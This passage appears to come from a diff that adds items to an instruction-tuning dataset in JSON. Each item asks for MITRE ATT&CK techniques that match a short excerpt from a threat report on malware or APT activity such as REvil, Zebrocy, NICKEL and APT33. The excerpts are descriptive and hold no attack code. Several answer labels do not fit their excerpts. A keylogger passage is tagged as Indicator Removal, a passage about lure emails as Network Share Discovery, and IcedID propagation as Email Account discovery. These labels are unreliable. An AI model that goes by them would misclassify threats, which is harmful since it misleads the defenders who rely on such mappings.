task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "At this point the C2 sends a JSON with commands to execute, including uploading/downloading files, taking a screenshot and finding *.rar archives on the host", + "output": "- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After gaining an initial foothold on a compromised system, the NICKEL actors routinely performed reconnaissance on the network, working to gain access to additional accounts or higher-value systems. NICKEL typically deployed a keylogger to capture credentials from users on compromised systems", + "output": "- T1070: Indicator Removal\n- T1114.002: Email Collection - Remote Email Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"In 2011, while still at McAfee, he went on to reveal Comment Crew (which he calls Comment Panda) operating alongside Elderwood. It's called that because the group so often uses a technique involving internal software \"\"comment\"\" features on web pages as a tool to infiltrate target computers\"", + "output": "- T1189: Drive-by Compromise" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege", + "output": "- T1518.001: Software Discovery - Security Software Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "We observed the threat group upload a second stage malware, known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command", + "output": "- T1049: System Network Connections Discovery\n- T1069.001: Permission Groups Discovery - Local Groups" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, it deletes Shadow Volume Copies and prevent the victim from using Shadow Volumes to recover their encrypted files", + "output": "- T1490: Inhibit System Recovery\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In a new sample of the REvil ransomware discovered by\u00a0MalwareHunterTeam, a new -smode command-line argument was added that forces the computer to reboot into Safe Mode before encrypting a device", + "output": "- T1562.009: Impair Defenses - Safe Mode Boot" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads", + "output": "- T1082: System Information Discovery\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since then, the threat actors have expanded delivery to include malicious spam campaigns, RDP attacks, and other attack vectors. In other reports, threat actors breached at least three managed service providers (MSPs) and used the access to deploy REvil to the MSPs' customers", + "output": "- T1566: Phishing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The following diagram illustrates the changes applied to targeted executables after infection has taken place and how these components interact on execution", + "output": "- T1091: Replication Through Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Starting with a simple scan, the first information that the malware can collect is related to files with the following extensions: .docx, .xlsx, .pdf, .pptx, .rar, .zip, .jpg, .bmp, .tiff. For each file found on the disk, it retrieves the full path and the last modified date of the file. That information is encrypted using the AES key mentioned earlier and stored in the file 0.txt. Another scan targets the extensions .dat, .json, .db and like the previous scan it retrieves the full path and last modified date of the file. Then it encrypts them and it stores it under the file 57.txt", + "output": "- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As seen in the above screenshot, there is a large overlap in unique strings in both samples. The original sample involved in the forbes.com breach used HTTP, which is consistent with the original variant discussed in this blog post. It should be noted that while the newest variant that uses direct network communication over port 22 no longer uses HTTP, references to the HTTP strings are still found within the sample itself. This is most likely due to code re-used by the attackers", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Zebrocy Trojan gathers system specific information that it will send to the C2 server via an HTTP POST request to the above URL. Like other Zebrocy samples, this Trojan collects system specific information it will send to the C2 server by running the command SYSTEMINFO & TASKLIST on the command line and by enumerating information about connected storage devices. This specific variant of Zebrocy will also send a screenshot of the victim host as a JPEG image to the C2 server", + "output": "- T1057: Process Discovery\n- T1082: System Information Discovery\n- T1120: Peripheral Device Discovery\n- T1113: Screen Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage", + "output": "- T1218.005: System Binary Proxy Execution - Mshta" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These are later used by the attackers to send targeted emails to the victims, with the obtained information being used to lure victims into opening those emails", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The trojanized update file is a standard Windows Installer Patch file that includes compressed resources associated with the update, including the trojanized SolarWinds.Orion.Core.BusinessLayer.dll component", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Cisco Talos has observed another malware campaign that utilizes malicious Microsoft Office documents (maldocs) to spread the remote access trojan (RAT) ObliqueRAT. ObliqueRAT has been linked to the Transparent Tribe APT group in the past", + "output": "- T1566.002: Phishing - Spearphishing Link\n- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Xbash is a novel and complex Linux malware and the newest work of an active cybercrime group. From its characteristics and behaviors, we could realize many trends in current IoT/Linux security battleground", + "output": "- T1053.003: Scheduled Task/Job - Cron" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once we deobfuscated it, we found that the script contained a large array of hard coded domain names, with one of them being randomly selected and used for subsequent DNS queries. It is important to note that while the Powershell scripts for stages 3 and 4 contain two arrays of domains, the first array is only used if a failure condition is reached while the sample is using the second array. Figure 8: Stage 3 Domain List The 'logic' function present within this Powershell script randomly selects a C2 domain from the second array in the script and uses this domain to perform an initial lookup. If the result of the initial DNS TXT record request is empty or in the case the lookup fails, the 'do_lookup' function is then called and randomly selects a domain from the first array in the script. Interestingly, the domains used by the 'do_lookup' function did not appear to have active 'www' or 'mail' TXT records. The script also uses specific subdomains which are combined with the domains and used for the initial DNS TXT record queries performed by the malware. The malware uses the contents of the TXT record in the response to these queries to determine what action to take next. For instance, the first subdomain is 'www' and a query response with a TXT record containing 'www' will instruct the script to proceed. The response to this DNS request results in the transmission of the fourth stage malware, stored within the TXT record as displayed in Figures 10 and 11. Due to the size of the Stage 4 payload, DNS makes use of TCP for this transaction", + "output": "- T1071.004: Application Layer Protocol - DNS" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The only way to ensure that deleted files, as well as files that you encrypt with EFS, are safe from recovery is to use a secure delete application. Secure delete applications overwrite a deleted file's on-disk data using techniques that are shown to make disk data unrecoverable, even using recovery technology that can read patterns in magnetic media that reveal weakly deleted files. SDelete (Secure Delete) is such an application. Note that SDelete securely deletes file data, but not file names located in free disk space", + "output": "- T1485: Data Destruction\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As part of Reflective DLL loading the malware performs the following tasks on the DLL it has unwrapped in memory: Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL) - Copy the unwrapped DLL into new locations in its own memory space. Build imports required by the DLL (based on the IAT of the DLL", + "output": "- T1055.001: Process Injection - Dynamic-link Library Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "4) Special attention was given to the design of the network communication, in order to reduce the noise a large number of encrypted machines may generate while contacting the Command and Control servers. 5) The encryption scheme is solid \u2013 using the AES and RSA algorithms", + "output": "- T1486: Data Encrypted for Impact\n- T1573.002: Encrypted Channel - Asymmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The tool was primarily used by the attackers to move laterally on the victim\u2019s network. PowerShell: Microsoft scripting tool that was used to run commands to download payloads, traverse compromised networks, and carry out reconnaissance. WinSCP: Open source FTP client used to exfiltrate data from targeted organizations", + "output": "- T1048.003: Exfiltration Over Alternative Protocol - Exfiltration Over Unencrypted Non-C2 Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Both variants of ServHelper use the same HTTP C&C protocol on port 443 (HTTPS) and, less frequently, port 80 (HTTP). An example of the initial phone home to the C&C server is shown in Figure 5", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "IcedID\u2019s operators probably plan on targeting businesses because they added a network propagation module to the malware from the get-go. IcedID possesses the ability to move to other endpoints, and X-Force researchers also observed it infecting terminal servers", + "output": "- T1087.003: Account Discovery - Email Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver proceeds to write a shortcut file to \u2018%TEMP%\\~WUpdate.lnk\u2019. This file is then copied to a filename of \u2018Windows Update.lnk\u2019, which is placed in the startup path previously identified. This shortcut file points to the path of the previously written \u2018Applet.cpl\u2019 file. Finally, Reaver.v1 will execute the \u2018~WUpdate.lnk\u2019 file in a new process, thus loading the recently dropped malicious CPL file. In the event this is successful, the malware will use the following path to store any dropped files", + "output": "- T1218.002: System Binary Proxy Execution - Control Panel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files", + "output": "- T1003.001: OS Credential Dumping - LSASS Memory\n- T1047: Windows Management Instrumentation\n- T1136: Create Account\n- T1070.001: Indicator Removal - Clear Windows Event Logs" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"3, 2019):\u00a0On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"\"suspected APT33 activity\"\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet\"", + "output": "- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim\u2019s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button", + "output": "- T1123: Audio Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "HAYMAKER is a backdoor that can download and execute additional payloads in the form of modules. It also conducts basic victim profiling activity, collecting the computer name, running process IDs, %TEMP% directory path and version of Internet Explorer. It communicates encoded system information to a single hard coded command and control (C2) server, using the system\u2019s default User-Agent string. BUGJUICE is a backdoor that is executed by launching a benign file and then hijacking the search order to load a malicious dll into it. BUGJUICE defaults to TCP using a custom binary protocol to communicate with the C2, but can also use HTTP and HTTPs if directed by the C2. It has the capability to find files, enumerate drives, exfiltrate data, take screenshots and provide a reverse shell. SNUGRIDE is a backdoor that communicates with its C2 server through HTTP requests. The malware\u2019s capabilities include taking a system survey, access to the filesystem, executing commands and a reverse shell", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The default case when the service tag is empty allows the malware to treat the contents of the response from the C2 as a command to execute via the Go library functions os.exec.Command or os.exec.Start. The format of the received command is checked against the below regex pattern for validity before executing and the command is read from the body of the message received from the C2", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. This malware module works independently of the others and maintains its own Bulgarian e-mail account. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits", + "output": "- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim\u2019s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration", + "output": "- T1140: Deobfuscate/Decode Files or Information\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK 